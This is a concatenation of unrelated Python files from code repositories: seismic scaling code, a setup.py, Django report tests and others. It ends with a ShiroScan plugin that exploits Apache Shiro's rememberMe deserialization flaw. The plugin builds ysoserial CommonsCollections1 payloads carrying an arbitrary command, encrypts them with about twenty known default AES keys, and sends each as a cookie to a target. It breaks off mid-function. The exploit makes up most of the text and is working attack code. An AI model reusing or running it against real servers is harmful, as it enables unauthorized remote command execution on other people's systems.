pred_test_y = (pred_test_y>0.35).astype(int)
out_df = pd.DataFrame({"qid":test_df["qid"].values})
out_df['prediction'] = pred_test_y
out_df.to_csv("submission.csv", index=False)
#
# **References:**
#
# Thanks to the below kernels which helped me with this one.
# 1. https://www.kaggle.com/jhoward/improved-lstm-baseline-glove-dropout
# 2. https://www.kaggle.com/sbongo/do-pretrained-embeddings-give-you-the-extra-edge
| [
"mccusker@gmail.com"
] | mccusker@gmail.com |
c4a2ffc18cb1fc769f67c2786359e8a28b139dc5 | 52aaf609fe3e5e03eb8040ae4e884d511dc2cfd0 | /source_models/utils/scaling.py | 6928070599df027a33965883e536b5429f5a329d | [] | no_license | GeoscienceAustralia/NSHA2018 | f2b140d142b5140893e20a946ed9a545c32e2749 | 86a3af0b52fe51470754291700f9a985b5177e2a | refs/heads/master | 2021-07-06T22:36:21.213958 | 2021-06-28T07:12:02 | 2021-06-28T07:12:02 | 55,460,974 | 7 | 5 | null | 2017-02-06T11:55:30 | 2016-04-05T02:23:03 | Jupyter Notebook | UTF-8 | Python | false | false | 2,058 | py | """Implement other iterations of Leonard 2014 scaling
Reference: Leonard, M., 2014. Self-consistent earthquake fault-scaling relations:
Update and extension to stable continental strike-slip faults.
Bulletin of the Seismological Society of America, 104(6), pp 2953-2965.
Jonathan Griffin
Geoscience Australia May 2018
"""
from numpy import power, log10
from openquake.hazardlib.scalerel import Leonard2014_SCR
class Leonard2014_SCR_extension(Leonard2014_SCR):
    """
    Extension of the OpenQuake implementation of Leonard (2014) for stable
    continental regions that adds rupture-width estimates derived from
    length and from area (not just area and moment).

    Reference: Leonard, M., 2014. Self-consistent earthquake fault-scaling
    relations: Update and extension to stable continental strike-slip
    faults. Bulletin of the Seismological Society of America, 104(6),
    pp 2953-2965.
    """

    def get_width_from_length(self, length, rake):
        """Return rupture width from rupture length and rake.

        Piecewise log-linear coefficients differ between strike-slip and
        dip-slip mechanisms, with a constant cap for very long strike-slip
        ruptures.
        """
        # Strike-slip when rake is within 45 degrees of 0 or of +/-180.
        strike_slip = (-45 <= rake <= 45) or abs(rake) >= 135
        if strike_slip:
            if length <= 1600:
                exponent = log10(length)
            elif length <= 70000:
                exponent = 1.068 + 0.667 * log10(length)
            else:
                # Width saturates for very long strike-slip ruptures.
                exponent = 4.298
        else:
            # Dip-slip (thrust or normal).
            if length <= 2500:
                exponent = 1.0 + log10(length)
            else:
                exponent = 1.130 + 0.667 * log10(length)
        return power(10, exponent)

    def get_width_from_area(self, area, rake):
        """Return rupture width from rupture area and rake.

        Same mechanism split as :meth:`get_width_from_length`, with the
        piecewise breaks expressed in terms of area.
        """
        strike_slip = (-45 <= rake <= 45) or abs(rake) >= 135
        if strike_slip:
            if area <= 2.56e6:
                exponent = 0.5 * log10(area)
            elif area < 1400e6:
                exponent = 0.641 + 0.4 * log10(area)
            else:
                # Width saturates for very large strike-slip ruptures.
                exponent = 4.298
        else:
            # Dip-slip (thrust or normal).
            if area <= 6.2e6:
                exponent = 0.5 * log10(area)
            else:
                exponent = 0.678 + 0.4 * log10(area)
        return power(10, exponent)
| [
"jono.d.griffin@gmail.com"
] | jono.d.griffin@gmail.com |
488d63b40c3dcea25f5d7e286580017fcfa026c0 | 09da1266eb3fb02ab0b62ab46b002fd9c35df881 | /setup.py | 7ed5f412036a31c8d55d3e08a9c7fb9f6ccce25b | [] | no_license | ixalon/run-if-ssm | e0baca2dd2480a8d3c0c733c677ef1ffe0633ebd | 4e1580b325fb371488ebf8653689b78231198537 | refs/heads/master | 2020-03-27T23:22:24.509919 | 2018-09-04T08:26:51 | 2018-09-04T09:13:39 | 147,313,075 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 679 | py | from setuptools import setup
import os
def read(fname):
    """Return the full text of *fname*, resolved relative to this file's
    directory (so `python setup.py` works from any working directory)."""
    # The original left the file object unclosed; a context manager
    # guarantees the handle is released even if .read() raises.
    with open(os.path.join(os.path.dirname(__file__), fname)) as handle:
        return handle.read()
# Package metadata for the run-if-ssm console utility; the long description
# is pulled from README.md at build time via read() above.
setup(
    name="run-if-ssm",
    version="1.0.0",
    author="Chris Warren",
    author_email="chris@ixalon.com",
    description=("A command line utility for running commands if a AWS SSM parameter is set."),
    license="BSD",
    keywords="aws",
    url="https://github.com/ixalon/run-if-ssm",
    # Runtime dependencies: AWS SDK plus the argh CLI helper.
    install_requires=[
        'boto3',
        'argh',
    ],
    # Installed as a plain script rather than an entry_points console script.
    scripts=['bin/run-if-ssm'],
    long_description=read('README.md'),
    classifiers=[
        "Development Status :: 3 - Alpha",
        "Topic :: Software Development :: Libraries :: Python Modules",
        "License :: OSI Approved :: BSD License",
    ],
)
| [
"chris@ixalon.net"
] | chris@ixalon.net |
ed66afc6b66bb066763ac8e3bfe8202fffbd4239 | 9c61ec2a55e897e4a3bb9145296081c648d812c4 | /docs/cd/06443007็จๅผ็ขผ/ch10/10-7.py | 12e0599c6cd9b2461a1e86381e5859ddb809a4da | [] | no_license | wildboy2arthur/ML-Class | 47899246251d12972a6d3875160c1cc8d1052202 | 345c86e3f8890919d59a63a79674acbdcd4577c4 | refs/heads/main | 2023-07-16T11:32:07.683652 | 2021-08-24T08:25:04 | 2021-08-24T08:25:04 | 399,388,026 | 0 | 0 | null | 2021-08-24T08:18:36 | 2021-08-24T08:18:35 | null | UTF-8 | Python | false | false | 74 | py | sns.scatterplot(x='mean radius', y='mean texture', data=df, hue='target'); | [
"1101404110@nkust.edu.tw"
] | 1101404110@nkust.edu.tw |
adbf4a84f7adec9c8567c5ed02472d79eadbf189 | 1c4d1333ccd1a8ad6c299071ca723c1a5141f6b1 | /venv/bin/pyrsa-priv2pub | 73ac3cc28dd92db2bb8ec314911e986c33be1031 | [] | no_license | ParnikaS/DoxperAPITesting | 6bf5bb6710dbbf13a876e130ace89977b7eedfcb | d0fad52bc559c0b2ade2e563b99cff562cbe1475 | refs/heads/master | 2020-03-18T14:36:31.728044 | 2018-05-25T13:19:36 | 2018-05-25T13:19:36 | 134,856,857 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 284 | #!/Users/parnikasharma/PycharmProjects/ApiTesting/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from rsa.util import private_to_public
if __name__ == '__main__':
    # Strip setuptools wrapper suffixes ("-script.py"/"-script.pyw"/".exe")
    # from argv[0] so usage/help output shows the plain command name, then
    # delegate to rsa's private-to-public CLI entry point and exit with its
    # return code.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(private_to_public())
| [
"parnikasharma@Abhisheks-MacBook-Air.local"
] | parnikasharma@Abhisheks-MacBook-Air.local | |
3ec63c24410051f8a1dc64905bbeb91ff0b787ea | 4839df5ce210b0d2d74a67677a2ec3d4faacf74d | /tally_ho/apps/tally/tests/views/reports/test_administrative_areas_reports.py | 4bc221d7f49dadf7c0978dcd26137ff7772fdb3b | [
"Apache-2.0"
] | permissive | hashem92/tally-ho | 5bf7f8f30804362ccf862d5d9a920bb1ce4bb17b | f1667a5dbef808f37c8717ebfacf53499333370c | refs/heads/master | 2023-05-05T08:01:14.968280 | 2020-11-05T13:48:21 | 2020-11-05T13:48:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,634 | py | from django.test import RequestFactory
from tally_ho.libs.permissions import groups
from tally_ho.apps.tally.models.sub_constituency import SubConstituency
from tally_ho.apps.tally.views.reports import administrative_areas_reports
from tally_ho.libs.tests.test_base import create_result_form,\
create_station, create_reconciliation_form, create_tally,\
create_center, create_region, create_constituency, create_office, TestBase
class TestAdministrativeAreasReports(TestBase):
    """Tests for the administrative-area report views (region,
    constituency and sub-constituency).

    The three report pages render identical turnout and votes-summary
    tables, differing only in page title, area column label and the ORM
    field used for grouping, so the shared assertions live in private
    helpers below.
    """

    def setUp(self):
        # Build the minimal fixture the report views aggregate over:
        # one tally with a region/office/constituency/sub-constituency
        # hierarchy, a single 20-registrant station and one fully-filled
        # reconciliation form (20 valid votes, nothing spoiled).
        self.factory = RequestFactory()
        self._create_permission_groups()
        self._create_and_login_user()
        self._add_user_to_group(self.user, groups.TALLY_MANAGER)
        self.tally = create_tally()
        self.tally.users.add(self.user)
        region = create_region(tally=self.tally)
        office = create_office(tally=self.tally, region=region)
        constituency = create_constituency(tally=self.tally)
        sc, _ = SubConstituency.objects.get_or_create(code=1, field_office='1')
        center = create_center(tally=self.tally,
                               sub_constituency=sc,
                               constituency=constituency)
        station = create_station(center=center, registrants=20)
        result_form = create_result_form(
            tally=self.tally,
            office=office,
            center=center,
            station_number=station.station_number)
        create_reconciliation_form(
            result_form=result_form,
            user=self.user,
            number_ballots_inside_box=20,
            number_cancelled_ballots=0,
            number_spoiled_ballots=0,
            number_unstamped_ballots=0,
            number_unused_ballots=0,
            number_valid_votes=20,
            number_invalid_votes=0,
            number_ballots_received=20,
        )

    def _get_report_response(self, view_class, path):
        """GET *path* through *view_class* as the logged-in tally manager
        and return the rendered response."""
        request = self._get_request()
        view = view_class.as_view()
        request = self.factory.get(path)
        request.user = self.user
        return view(
            request,
            tally_id=self.tally.pk,
            group_name=groups.TALLY_MANAGER)

    def _assert_area_reports(self, response, page_title, area_label,
                             group_field):
        """Assert *response* renders the turnout and votes-summary report
        tables for the administrative area grouped by *group_field*."""
        turnout_report = \
            administrative_areas_reports.generate_voters_turnout_report(
                self.tally.id, group_field)[0]
        self.assertContains(response, f"<h1>{page_title}</h1>")
        # Turnout report: headers then the single fixture row.
        self.assertContains(response, "<h3>Turn Out Report</h3>")
        self.assertContains(response, f"<th>{area_label}</th>")
        self.assertContains(response, "<th>Total number of voters</th>")
        self.assertContains(response, "<th>Number of voters voted</th>")
        self.assertContains(response, "<th>Male voters</th>")
        self.assertContains(response, "<th>Female voters</th>")
        self.assertContains(response, "<th>Turnout percentage</th>")
        self.assertContains(
            response, f'<td>{turnout_report["name"]}</td>')
        self.assertContains(
            response,
            f'<td>{turnout_report["number_of_voters_voted"]}</td>')
        self.assertContains(
            response,
            f'<td>{turnout_report["total_number_of_registrants"]}</td>')
        self.assertContains(
            response,
            f'<td>{turnout_report["total_number_of_ballots_used"]}</td>')
        self.assertContains(
            response, f'<td>{turnout_report["male_voters"]}</td>')
        self.assertContains(
            response, f'<td>{turnout_report["female_voters"]}</td>')
        self.assertContains(
            response,
            f'<td>{turnout_report["turnout_percentage"]} %</td>')
        votes_summary_report = \
            administrative_areas_reports.generate_votes_summary_report(
                self.tally.id, group_field)[0]
        # Votes-summary report: headers then the single fixture row.
        self.assertContains(response, "<h3>Votes Summary Report</h3>")
        self.assertContains(response, f"<th>{area_label}</th>")
        self.assertContains(response, "<th>Total number of valid votes</th>")
        self.assertContains(
            response, "<th>Total number of invalid votes</th>")
        self.assertContains(
            response, "<th>Total number of cancelled votes</th>")
        self.assertContains(
            response, f'<td>{votes_summary_report["name"]}</td>')
        self.assertContains(
            response,
            f'<td>{votes_summary_report["number_valid_votes"]}</td>')
        self.assertContains(
            response,
            f'<td>{votes_summary_report["number_invalid_votes"]}</td>')
        self.assertContains(
            response,
            f'<td>{votes_summary_report["number_cancelled_ballots"]}</td>')

    def test_regions_reports(self):
        """
        Test that the region reports are rendered as expected.
        """
        response = self._get_report_response(
            administrative_areas_reports.RegionsReportsView,
            '/reports-regions')
        self._assert_area_reports(
            response,
            'Region Reports',
            'Region Name',
            'result_form__office__region__name')

    def test_constituency_reports(self):
        """
        Test that the constituency reports are rendered as expected.
        """
        response = self._get_report_response(
            administrative_areas_reports.ConstituencyReportsView,
            '/reports-constituencies')
        self._assert_area_reports(
            response,
            'Constituency Reports',
            'Constituency Name',
            'result_form__center__constituency__name')

    def test_sub_constituency_reports(self):
        """
        Test that the sub constituency reports are rendered as expected.
        """
        response = self._get_report_response(
            administrative_areas_reports.SubConstituencyReportsView,
            '/reports-sub-constituencies')
        self._assert_area_reports(
            response,
            'Sub Constituency Reports',
            'Sub Constituency Name',
            'result_form__center__sub_constituency__code')
| [
"jmwashuma@live.com"
] | jmwashuma@live.com |
7e13a86247f31bdea66a73b542bf5fc8b7f875d4 | 7ab40a447bc1b82f3c6104fc1349fd9360629dd1 | /moule/plugins/CommonsCollections1.py | c9d78eb386369b0b97b8600d9cef6b530a7f257a | [] | no_license | 3ecurity/ShiroScan | 48a5feb8a4bfe87803769f480c8ca12d96413ca5 | c7bb0df849b3be9e09e4b2966d66f67f98d0df5d | refs/heads/master | 2021-03-26T19:06:44.736417 | 2020-03-16T17:14:35 | 2020-03-16T17:14:35 | 247,739,237 | 0 | 0 | null | 2020-03-16T15:07:53 | 2020-03-16T15:07:52 | null | UTF-8 | Python | false | false | 31,348 | py | # -*- coding: utf-8 -*-
# By ๆฏๆbeast svenbeast.com
import os
import base64
import uuid
import subprocess
import requests
import sys
from Crypto.Cipher import AES
from ..main import Idea
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
JAR_FILE = 'moule/ysoserial.jar'
@Idea.plugin_register('Class2:CommonsCollections1')
class CommonsCollections1(object):
    def process(self,url,command):
        """Plugin entry point: fire the CommonsCollections1 payload set at
        *url*, attempting to execute *command* on the target (delegates to
        :meth:`poc`)."""
        self.poc(url,command)
def poc(self,url, command):
target = url
try:
# ็ฎๆ ๆบๆง่ก็ไปฃ็
payload = self.generator(command, JAR_FILE) # ็ๆpayload
r = requests.get(target, cookies={'rememberMe': payload.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ1
#print("payload1ๅทฒๅฎๆ,ๅญๆฎตrememberMe:็้่ฆ่ชๅทฑๅฐๆบไปฃ็ print "+payload.decode())
if(r.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key1:kPH+bIxk5D2deZiIxcaaaA== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key1:kPH+bIxk5D2deZiIxcaaaA== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r.status_code))
payload2 = self.generator2(command, JAR_FILE) # ็ๆpayload2
r2 = requests.get(target, cookies={'rememberMe': payload2.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ2
if(r2.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key2:wGiHplamyXlVB11UXWol8g== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r2.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key2:wGiHplamyXlVB11UXWol8g== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r2.status_code))
payload3 = self.generator3(command, JAR_FILE) # ็ๆpayload3
r3 = requests.get(target, cookies={'rememberMe': payload3.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ3
if(r3.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key3:2AvVhdsgUs0FSA3SDFAdag== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r3.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key3:2AvVhdsgUs0FSA3SDFAdag== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r3.status_code))
payload4 = self.generator4(command, JAR_FILE) # ็ๆpayload4
r4 = requests.get(target, cookies={'rememberMe': payload4.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ4
if(r4.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key4:4AvVhmFLUs0KTA3Kprsdag== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r4.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key4:4AvVhmFLUs0KTA3Kprsdag== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r4.status_code))
payload5 = self.generator5(command, JAR_FILE) # ็ๆpayload5
r5 = requests.get(target, cookies={'rememberMe': payload5.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ5
if(r5.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key5:3AvVhmFLUs0KTA3Kprsdag== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r5.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key5:3AvVhmFLUs0KTA3Kprsdag== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r5.status_code))
payload6 = self.generator6(command, JAR_FILE) # ็ๆpayload6
r6 = requests.get(target, cookies={'rememberMe': payload6.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ6
if(r6.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key6:Z3VucwAAAAAAAAAAAAAAAA== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r6.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key6:Z3VucwAAAAAAAAAAAAAAAA== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r6.status_code))
payload7 = self.generator7(command, JAR_FILE) # ็ๆpayload7
r7 = requests.get(target, cookies={'rememberMe': payload7.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ2
if(r7.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key7:U3ByaW5nQmxhZGUAAAAAAA== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r7.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key7:U3ByaW5nQmxhZGUAAAAAAA== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r7.status_code))
payload8 = self.generator8(command, JAR_FILE) # ็ๆpayload8
r8 = requests.get(target, cookies={'rememberMe': payload8.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ8
if(r8.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key8:wGiHplamyXlVB11UXWol8g== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r8.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key8:wGiHplamyXlVB11UXWol8g== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r8.status_code))
payload9 = self.generator9(command, JAR_FILE) # ็ๆpayload9
r9 = requests.get(target, cookies={'rememberMe': payload9.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ9
if(r9.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key9:6ZmI6I2j5Y+R5aSn5ZOlAA== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r9.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key9:6ZmI6I2j5Y+R5aSn5ZOlAA== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r9.status_code))
#ๅ็็บฟ
#ๅ่กฅ็ผ็
payload100 = self.generator100(command, JAR_FILE) # ็ๆpayload100
r100 = requests.get(target, cookies={'rememberMe': payload100.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ100
if(r100.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key10:fCq+/xW488hMTCD+cmJ3aQ== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r100.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key10:fCq+/xW488hMTCD+cmJ3aQ== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r100.status_code))
payload111 = self.generator111(command, JAR_FILE) # ็ๆpayload111
r111 = requests.get(target, cookies={'rememberMe': payload111.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ111
if(r111.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key11:1QWLxg+NYmxraMoxAXu/Iw== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r111.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key11:1QWLxg+NYmxraMoxAXu/Iw== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r111.status_code))
payload222 = self.generator222(command, JAR_FILE) # ็ๆpayload222
r222 = requests.get(target, cookies={'rememberMe': payload222.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ222
if(r222.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key12:ZUdsaGJuSmxibVI2ZHc9PQ== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r222.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key12:ZUdsaGJuSmxibVI2ZHc9PQ== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r222.status_code))
payload333 = self.generator333(command, JAR_FILE) # ็ๆpayload333
r333 = requests.get(target, cookies={'rememberMe': payload333.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ333
if(r333.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key13:L7RioUULEFhRyxM7a2R/Yg== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r333.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key13:L7RioUULEFhRyxM7a2R/Yg== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r333.status_code))
payload444 = self.generator444(command, JAR_FILE) # ็ๆpayload444
r444 = requests.get(target, cookies={'rememberMe': payload444.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ444
if(r444.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key14:r0e3c16IdVkouZgk1TKVMg== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r444.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key14:r0e3c16IdVkouZgk1TKVMg== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r444.status_code))
payload666 = self.generator666(command, JAR_FILE) # ็ๆpayload666
r666 = requests.get(target, cookies={'rememberMe': payload666.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ666
if(r666.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key15:5aaC5qKm5oqA5pyvAAAAAA== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r666.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key15:5aaC5qKm5oqA5pyvAAAAAA== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r666.status_code))
payload777 = self.generator777(command, JAR_FILE) # ็ๆpayload777
r777 = requests.get(target, cookies={'rememberMe': payload777.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ777
if(r777.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key16:bWluZS1hc3NldC1rZXk6QQ== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r777.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key16:bWluZS1hc3NldC1rZXk6QQ== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r777.status_code))
payload888 = self.generator888(command, JAR_FILE) # ็ๆpayload888
r888 = requests.get(target, cookies={'rememberMe': payload888.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ888
if(r888.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key17:a2VlcE9uR29pbmdBbmRGaQ== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r888.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key17:a2VlcE9uR29pbmdBbmRGaQ== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r888.status_code))
payload999 = self.generator999(command, JAR_FILE) # ็ๆpayload999
r999 = requests.get(target, cookies={'rememberMe': payload999.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ999
if(r999.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key18:WcfHGU25gNnTxTlmJMeSpw== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r999.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key18:WcfHGU25gNnTxTlmJMeSpw== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r999.status_code))
payload_001 = self.generator_001(command, JAR_FILE) # ็ๆpayload555
r_001 = requests.get(target, cookies={'rememberMe': payload_001.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ001
if(r_001.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key19:bWljcm9zAAAAAAAAAAAAAA== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r_001.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key19:bWljcm9zAAAAAAAAAAAAAA== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r_001.status_code))
payload_002 = self.generator_002(command, JAR_FILE) # ็ๆpayload1111
r_002 = requests.get(target, cookies={'rememberMe': payload_002.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ002
if(r_002.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key20:MTIzNDU2Nzg5MGFiY2RlZg== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r_002.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key20:MTIzNDU2Nzg5MGFiY2RlZg== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r_002.status_code))
payload_003 = self.generator_003(command, JAR_FILE) # ็ๆpayload1111
r_003 = requests.get(target, cookies={'rememberMe': payload_003.decode()}, timeout=20) # ๅ้้ช่ฏ่ฏทๆฑ002
if(r_003.status_code==200):
print("[+] CommonsCollections1ๆจกๅ key21:5AvVhmFLUs0KTA3Kprsdag== ๅทฒๆๅๅ้๏ผ")
print("[+] ็ถๆ็ :"+str(r_003.status_code))
else:
print("[-] CommonsCollections1ๆจกๅ key21:5AvVhmFLUs0KTA3Kprsdag== ๅ้ๅผๅธธ๏ผ")
print("[-] ็ถๆ็ :"+str(r_003.status_code))
#ๅ่กฅ็ผ็
except Exception as e:
print(e)
return False
def generator(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "kPH+bIxk5D2deZiIxcaaaA==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv) #ๅkeyๅฝฑๅ็encryptor
file_body = pad(popen.stdout.read()) #ๅpopenๅฝฑๅ็file_body
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator2(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "wGiHplamyXlVB11UXWol8g==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator3(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "2AvVhdsgUs0FSA3SDFAdag==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator4(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "4AvVhmFLUs0KTA3Kprsdag==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator5(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "3AvVhmFLUs0KTA3Kprsdag==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator6(self,command, fp):
if not os.path.exists(fp):
raise Exception('jar file not found!')
popen = subprocess.Popen(['java', '-jar', fp, 'CommonsCollections1', command], #popen
stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "Z3VucwAAAAAAAAAAAAAAAA==" #key
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
def generator7(self,command, fp):
if not os.path.exists(fp):
